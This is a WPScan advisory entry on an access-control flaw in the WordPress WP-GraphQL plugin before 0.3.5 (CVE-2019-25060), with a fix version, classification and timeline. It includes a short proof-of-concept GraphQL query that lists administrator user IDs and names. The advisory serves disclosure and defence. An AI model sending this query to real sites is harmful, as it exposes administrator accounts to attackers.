WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

WP-GraphQL < 0.3.5 - Improper Access Control

Description

The plugin doesn't properly restrict access to information about other users' roles on the affected site. Because of this, a remote attacker could forge a GraphQL query to retrieve the account roles of every user on the site.

Proof of Concept

query getUsers{
  users(where:{role:ADMINISTRATOR}){
    edges{
      node{
        userId
        name
      }
    }
  }
}

Affects Plugins

wp-graphql
Fixed in version 0.3.5

References

CVE
CVE-2019-25060
URL
https://github.com/wp-graphql/wp-graphql/pull/900

Classification

Type

ACCESS CONTROLS

OWASP top 10
A5: Broken Access Control
CWE
CWE-284

Miscellaneous

Original Researcher

Rohan Pagey

Submitter

Rohan Pagey

Verified

Yes

WPVDB ID
393be73a-f8dc-462f-8670-f20ab89421fc

Timeline

Publicly Published

2019-07-10 (about 2 years ago)

Added

2022-05-02 (about 2 months ago)

Last Updated

2022-05-03 (about 2 months ago)

Our Other Services

WPScan WordPress Security Plugin